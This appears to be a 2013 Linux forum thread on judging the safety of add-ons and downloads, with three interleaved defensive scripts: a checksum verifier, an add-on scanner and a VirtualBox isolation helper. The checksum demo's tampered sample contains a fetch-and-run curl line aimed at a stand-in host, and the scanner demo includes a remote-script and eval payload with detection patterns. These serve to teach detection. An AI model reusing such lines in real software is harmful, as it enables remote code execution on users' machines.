  #1 leaf_also (Just Joined!, Join Date: Jul 2012, Posts: 5)

    Executables, add-ons, extensions. Who to trust? How to test.


    If you have answers, links, or search-phrases applying to any of these questions,
    please join in. This is not an emergency; I am reading and researching so I do not get into trouble.
    I am on Ubuntu 12.04, but will add MS Win somewhere, someday. I'm mainly concerned with Linux for now.

    Do you (should I) keep JavaScript turned off?
    If so, how do you watch YouTube?

    IIRC, add-ons and extensions to Firefox (or any browser)
    could contain malware (root-kit?); which ones are to be trusted?

    I will be looking for an add-on to disable Flash readers from automatically starting in a web page;
    it was recommended because Flash readers are a vulnerable area.
    How can I tell if an add-on contains malware, or if the authors are to be trusted?

    Does Flashgot have a "trusted" reputation? How to test it myself?

    In order of preference, what is the safest way to download/install
    security software, so I do not get a fake look-alike?
    Guessing: 1) use Software Center, 2) terminal session: sudo apt-get ...,
    3) Google, find it, and do a direct download.
    Does Update Manager even apply to this consideration?

    Background:
    I was watching a "Securing Your Linux Box" video (skip to min 45
    for security; 2 guys discussing); I got some good tips.
    Then I went to the blog site ("Introduction to Linux Hardening" by Chris)
    of one of these guys and read a security article.
    Some specifics that they mentioned are listed below.

    Tiger, Logcheck, Tripwire, GUFW, SSH keys (not passwords),
    maybe disable SSH and any service that is not needed,
    Denyhosts, Java (too brief), backups using a utility: Ghost,
    Clonezilla etc.

    Thanks to all.
    Last edited by leaf_also; 06-02-2013 at 10:14 PM.
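
    The "direct download" path in the question above (option 3) is the one where a fake look-alike can slip in, because nothing checks the file for you the way apt's signed repository metadata does for options 1 and 2. The script below is an added example, not code from the thread or from any of the tools it names: it verifies a downloaded file against a coreutils-style SHA256SUMS list ("<hex digest>  <filename>" per line). It assumes the SHA256SUMS file was fetched separately over HTTPS from the project's own site (ideally after checking its GPG signature with gpg --verify SHA256SUMS.gpg SHA256SUMS), and it uses a constructed installer and a tampered copy so it runs offline.

```python
"""Verify a downloaded file against a published SHA256SUMS-style list.

Added example (not from the thread). Assumed format: GNU coreutils
"<hex digest>  <filename>" lines; the checksum list must come over a
separate trusted channel, otherwise an attacker who replaced the download
can replace the checksum too.  Sample data below is constructed inline.
"""
import hashlib
import hmac
import os
import tempfile


def parse_sha256sums(text):
    """Map filename -> lowercase hex digest from coreutils-style lines."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        digest, name = parts
        name = name.lstrip("*")  # '*' prefix means binary mode in sha256sum output
        if len(digest) != 64:
            raise ValueError("malformed digest for %s" % name)
        table[name] = digest.lower()
    return table


def sha256_file(path, chunk=1 << 20):
    """Stream the file so large ISOs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_download(path, sums_text):
    """True only if the file's digest matches the entry for its basename.

    A missing entry is a failure, not a pass: an unlisted file is exactly
    what a look-alike would be.
    """
    expected = parse_sha256sums(sums_text).get(os.path.basename(path))
    if expected is None:
        return False
    actual = sha256_file(path)
    return hmac.compare_digest(actual, expected)


# Constructed sample: a harmless "installer", its published digest, and a
# tampered copy of the same file name that phones home before installing.
GOOD = b"#!/bin/sh\necho install security tool\n"
BAD = b"#!/bin/sh\ncurl http://evil.example/x | sh\necho install security tool\n"
GOOD_SHA = hashlib.sha256(GOOD).hexdigest()
SUMS = "# SHA256SUMS (constructed)\n%s  tool-1.0.sh\n" % GOOD_SHA


def demo():
    """Return (genuine file verifies, tampered file verifies)."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "tool-1.0.sh")
    with open(path, "wb") as f:
        f.write(GOOD)
    ok = verify_download(path, SUMS)
    with open(path, "wb") as f:
        f.write(BAD)
    tampered = verify_download(path, SUMS)
    return ok, tampered


if __name__ == "__main__":
    print(demo())  # (True, False)
```

    For option 2, the equivalent check is already built in: apt refuses a package whose Release file signature does not verify, which is why adding a random PPA key with apt-key is the risky step, not the download itself.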

  #2 Steven_G (Linux User, Join Date: Jun 2012, Location: Western US, Posts: 415)
    You ask a lot of good questions. I had a lot of the same questions when I got into *nix a couple of years ago. Fortunately for me I had almost 30 years of computer experience to draw on and found out pretty quickly that a lot of the answers are the same no matter what platform you are using. A lot of it is just common sense and experience. I could literally write a book on this. But I'm not going to. I will try to get you on the right path.

    For example, I do one of the "Big No-No's" a lot: I install third-party software a lot. But the rules for doing it "safely" are pretty much the same for doze and nix. I don't just slap anything in my system. Webupd8 is a good place to get *nix stuff. They want to protect their rep, so they check for coodies and crap. Same thing goes for CNet and doze. But, that is not 100% foolproof. I have picked up trojans from CNet. So, you have an incremental backup system in place, storing the data on a disk not attached to the machine (USB, NAS), and when you get coodies you roll back your system.

    So, when hunting for 3rd party software look for sources who have skin in the game and a big stake to lose if they get a rep for doling out coodies and crap and then still CYA.

    You also implement compartmentalized computing. I have dozens of specific-use VMs with various OS's that have been locked down to different degrees and with browsers that have been locked down to various degrees depending on their purpose. Most of them share my system-wide clipboard, but not all of them. My banking VM is specifically isolated from the system-wide clipboard.

    My banking VM is the most locked down of all and would never be any good for more general-purpose uses. It takes 20 minutes to open up all of the pinholes necessary for a website to work. It does not have Java or Flash. A lot of elements of most websites simply will not function because they try to reach too far out of the browser and too far into the system. It is currently configured to work only with the ~18 sites I need to pay bills and is never used for anything else.

    On the other hand, my general use web surfer VM, which I am using now, has good sec but is not locked down to DefCon 10 gajillion. But, I'm not surfing the web directly on my "real" OS either.

    Quote Originally Posted by leaf_also:
    > Do you (should I) keep JavaScript turned off?
    > If so, how do you watch YouTube?
    See above. The web VM has Java and Flash. But there's both good security in there and no info in there.

    My "real" box has Java; as much as I hate it, I just can't get away from it. But, it is never exposed to the web either, which is your big problem with Java.

    One of the best things you can do for all-around browser sec is run NoScript.

    My basic attitude towards the web is that it is an insane enemy combatant with extremely contagious STDs and information that is usually wrong but sometimes useful. This mindset will save you a lot of heartaches, heartburn and headaches.

    Quote Originally Posted by leaf_also:
    > IIRC, add-ons and extensions to Firefox (or any browser)
    > could contain malware (root-kit?); which ones are to be trusted?
    Same as above: Who has skin in the game based on their rep and their cred? Who's been reviewed by thousands of people with a 92% satisfaction rating, and who's been reviewed by 7 people with a 90% bad rating? Who has only 1 review with 100% satisfaction (um, usually from the person who made it)?

    I will include a list of addons I use and trust for general web surfing: AdBlock Edge, AdBlock Plus Pop-up Addon, Ask for Sanitize, Better Privacy, Calomel SSL Validation, Ghostery, Modify Headers, New Tab Homepage, NoScript, Passive Recon, Search Engine Security, Secure Sanitizer, View Source, View Source Chart, Webmail Ad Blocker and WoT.

    All of those plus another 1/2 dozen for banking.

    A special note on Modify Headers: Most, but not all, attacks are automated and tailored. For example, you visit a bad site, it will "scan" you (read your user agent string) and then launch different attacks if you are doze or *nix or Apple, and even differentiate between 7 and XP, etc. Most of this is done with scripts. Well, NoScript will put the kibosh on a lot of that crap, and then I use Modify Headers to change my user agent string to a 5-year-old version of Firefox running on XP, so the stupid thing is trying to run the completely wrong set of attacks on me!

    Quote Originally Posted by leaf_also:
    > I will be looking for an add-on to disable Flash readers from automatically starting in a web page;
    > it was recommended because Flash readers are a vulnerable area.
    > How can I tell if an add-on contains malware, or if the authors are to be trusted?
    I think I've already covered this above. And the specific add-on you're looking for is NoScript.

    Quote Originally Posted by leaf_also:
    > Does Flashgot have a "trusted" reputation? How to test it myself?
    No idea on "Flashgot" itself; I've covered the easy way to "test" trustworthiness.

    Quote Originally Posted by leaf_also:
    > In order of preference, what is the safest way to download/install
    > security software, so I do not get a fake look-alike?
    > Guessing: 1) use Software Center, 2) terminal session: sudo apt-get ...,
    > 3) Google, find it, and do a direct download.
    > Does Update Manager even apply to this consideration?
    Basically yes, and see above.

    Quote Originally Posted by leaf_also:
    > Background:
    > I was watching a "Securing Your Linux Box" video;
    > 2 guys discussing; I got some good tips.
    > Then I went to the blog site ("Introduction to Linux Hardening" by Chris)
    > of one of these guys and read a security article.
    > Some specifics that they mentioned are listed below.
    >
    > Tiger, Logcheck, Tripwire, GUFW, SSH keys (not passwords),
    > maybe disable SSH and any service that is not needed,
    > Denyhosts, Java (too brief), backups using a utility: Ghost,
    > Clonezilla etc.
    Yes to all, plus IPKungFu, FWsnort, PSAD, Linux Malware Detect, OinkMaster, Bastille, TrueCrypt, ArpOn, AppArmor, AppArmor-Utils, AppArmor Profiles, lsat, AIDE, AVG AV, Clam AV, rkhunter, chkrootkit and Unhide.

    Stuff you didn't ask that you also need to learn: network security configuration, router sec, VPNs, DNS config and leaks, encrypting the home partition, net anonymity, and what sec settings to change in Firefox.

    That should get you a good start on the basics.

    Quote Originally Posted by leaf_also:
    > Thanks to all.
    You're welcome!
    Last edited by Steven_G; 06-02-2013 at 07:11 PM. Reason: Typo, forgot a couple of addons
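
    Reputation and review counts are the quick test Steven_G describes. The complement, when an add-on is small enough to look at, is to open it: an .xpi is a zip file, so the manifest and scripts can be read before anything is installed. The script below is an added example, not code from the thread or from Mozilla: it lists the permissions an add-on requests, marks the ones that hand over the whole browser, and greps the scripts for patterns that deserve a closer read (eval/new Function, scripts loaded from remote URLs, base64/fromCharCode obfuscation). A hit is a reason to read the code, not proof of malware. It assumes the WebExtension layout (manifest.json); legacy install.rdf add-ons of the Firefox-2013 era ran with full browser privileges and are only flagged for manual review. The sample "Flash blocker" add-on is constructed in memory.

```python
"""Static triage of a Firefox add-on (.xpi) before installing it.

Added example (not from the thread). Assumes the WebExtension layout
(manifest.json); the sample add-on below is constructed, not a real one.
"""
import io
import json
import re
import zipfile

# Patterns worth a human look; none of them is malicious by itself.
RISKY = {
    "eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "remote_script": re.compile(r"(?:src|import|fetch|XMLHttpRequest)[^\n]*https?://", re.I),
    "obfuscation": re.compile(r"String\.fromCharCode|\bunescape\s*\(|\batob\s*\("),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}

# Permissions that give an extension the whole browser, not one feature.
BROAD_PERMS = {
    "<all_urls>", "*://*/*", "http://*/*", "https://*/*",
    "tabs", "webRequest", "webRequestBlocking", "nativeMessaging",
    "cookies", "history", "downloads", "clipboardRead", "proxy",
}


def inspect_xpi(data):
    """Return {permissions, broad, hits (file -> patterns), notes} for xpi bytes."""
    report = {"permissions": [], "broad": [], "hits": {}, "notes": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "manifest.json" in names:
            manifest = json.loads(z.read("manifest.json").decode("utf-8"))
            perms = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
            report["permissions"] = perms
            report["broad"] = sorted(p for p in perms if p in BROAD_PERMS)
        elif "install.rdf" in names:
            report["notes"].append("legacy install.rdf add-on: full browser privileges, review by hand")
        else:
            report["notes"].append("no manifest found")
        for name in names:
            if not name.lower().endswith((".js", ".html", ".htm")):
                continue
            text = z.read(name).decode("utf-8", "replace")
            found = sorted(k for k, rx in RISKY.items() if rx.search(text))
            if found:
                report["hits"][name] = found
    return report


def build_sample_xpi():
    """Constructed sample: a 'Flash blocker' that asks for everything and phones home."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps({
            "manifest_version": 2,
            "name": "Flash Blocker (constructed sample)",
            "version": "1.0",
            "permissions": ["<all_urls>", "webRequest", "webRequestBlocking", "storage"],
            "background": {"scripts": ["bg.js"]},
        }))
        z.writestr("bg.js",
                   "var s = document.createElement('script');\n"
                   "s.src = 'http://update.example/payload.js';\n"  # remote code at runtime
                   "eval(atob('YWxlcnQoMSk='));\n")                  # decoded-and-evaluated blob
        # The part that actually does what the add-on claims: nothing to flag here.
        z.writestr("content.js",
                   "document.querySelectorAll('object,embed').forEach(e => e.remove());\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(inspect_xpi(build_sample_xpi()), indent=2))
```

    On a real file, replace build_sample_xpi() with open("addon.xpi", "rb").read(). A blocker that only needs to remove object/embed tags has no business asking for <all_urls> plus webRequestBlocking; the mismatch between what an add-on claims to do and what it asks for is the fastest tell.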

  #3 leaf_also (Just Joined!, Join Date: Jul 2012, Posts: 5)
    Steven_G,
    Thanks so much for your thoughtful reply.
    It will take some time for me to digest.

    I particularly appreciate your isolated function approach.

    Can you tell me more on VMs?
    Edit: I just corrected my view of Wine, i.e., MS app running on Linux.
    Is Wine an example?

    I do no banking on the internet; however I use a credit/debit card
    occasionally and that specific use could be isolated from general
    web surfing, searching and evaluating.

    I just downloaded/installed one of each variety of security software.
    Tested and tried some of it, already.
    Last edited by leaf_also; 06-03-2013 at 12:09 AM.

  #4 Steven_G (Linux User, Join Date: Jun 2012, Location: Western US, Posts: 415)
    VM = virtual machine. It is a program that kind of creates a "pretend" computer inside your computer. Bad stuff can get out of a virtual machine to the real machine, but there are security steps you can take to help prevent that. And sometimes the bad guys find a way through the code of the VM to the real machine anyway. But, like all programs it is constantly updated, and it is merely one part of a multi-layered approach to security.

    I use VirtualBox. I recommend that you use the version from their website and not from the Ubuntu repos. It works better and has fewer problems.

    And, no, Wine is a compatibility layer. It helps Windows software run directly on a Linux system. Think of it as a translator. And you need to learn how to secure it as well. There is the possibility that a Windows virus in Wine could have some effects on the Linux side of your system. But, it is fairly easy to secure it.

    And separating parts of the system from each other is not just for banking. I have a virtual machine that is just for general web surfing and nothing else. The goal is to put as many layers of security as practically possible between both your important information / your core operating system and the outside world.
    Last edited by Steven_G; 06-03-2013 at 03:57 AM.
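
    The "security steps you can take" for a single-purpose VM such as the banking VM in #2 are mostly about closing the channels between guest and host: shared clipboard, drag-and-drop, shared folders, USB passthrough, audio and remote display. The script below is an added example, not from the thread or from the VirtualBox project: it builds the VBoxManage commands that close those channels for one VM, removes any shared folders it finds in "VBoxManage showvminfo --machinereadable" output, and takes a clean snapshot to roll back to after each session. It runs the commands only if VBoxManage is on PATH and otherwise just returns the plan. Assumptions: VirtualBox 6.1 or later (the clipboard option is --clipboard-mode; older releases spell it --clipboard), the VM already exists and is powered off, and outbound NAT on the first adapter is all the network it needs. The showvminfo sample is constructed.

```python
"""Close the guest<->host channels on a single-purpose VirtualBox VM.

Added example (not from the thread). Assumes VirtualBox 6.1+ option names
and a powered-off VM; runs for real only if VBoxManage is installed.
"""
import re
import shutil
import subprocess

# One line per shared folder in `VBoxManage showvminfo <vm> --machinereadable`.
SHARED_RE = re.compile(r'^SharedFolderNameMachineMapping\d+="(.*)"$', re.M)


def shared_folders_from_info(info_text):
    """Names of permanent shared folders parsed from machine-readable showvminfo."""
    return SHARED_RE.findall(info_text)


def isolation_commands(vm, shared_folders=()):
    """The VBoxManage plan, as argv lists, in the order they should run."""
    mod = ["VBoxManage", "modifyvm", vm]
    cmds = [
        mod + ["--clipboard-mode", "disabled"],   # host clipboard stays on the host
        mod + ["--draganddrop", "disabled"],
        mod + ["--usb", "off"],                   # no host USB devices in the guest
        mod + ["--audio", "none"],
        mod + ["--vrde", "off"],                  # no remote display server
        mod + ["--nic1", "nat"],                  # outbound only, no bridged LAN access
        mod + ["--nic2", "none"],
        mod + ["--nic3", "none"],
        mod + ["--nic4", "none"],
    ]
    for name in shared_folders:
        cmds.append(["VBoxManage", "sharedfolder", "remove", vm, "--name", name])
    # A known-good baseline to restore before every session.
    cmds.append(["VBoxManage", "snapshot", vm, "take", "clean-baseline"])
    return cmds


def apply_isolation(vm, dry_run=None):
    """Run the plan (or return it unchanged when VBoxManage is absent)."""
    if dry_run is None:
        dry_run = shutil.which("VBoxManage") is None
    info = ""
    if not dry_run:
        info = subprocess.run(["VBoxManage", "showvminfo", vm, "--machinereadable"],
                              check=True, capture_output=True, text=True).stdout
    cmds = isolation_commands(vm, shared_folders_from_info(info))
    if not dry_run:
        for c in cmds:
            subprocess.run(c, check=True)
    return cmds


# Constructed sample of showvminfo output with one shared folder defined.
SAMPLE_INFO = (
    'name="banking"\n'
    'SharedFolderNameMachineMapping1="downloads"\n'
    'SharedFolderPathMachineMapping1="/home/me/Downloads"\n'
)

if __name__ == "__main__":
    for c in isolation_commands("banking", shared_folders_from_info(SAMPLE_INFO)):
        print(" ".join(c))
```

    Restore the snapshot with "VBoxManage snapshot banking restore clean-baseline" before each banking session, so anything picked up during one session does not carry over to the next. The remaining channel is the network itself, which is what the guest-side browser hardening in #2 is for.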
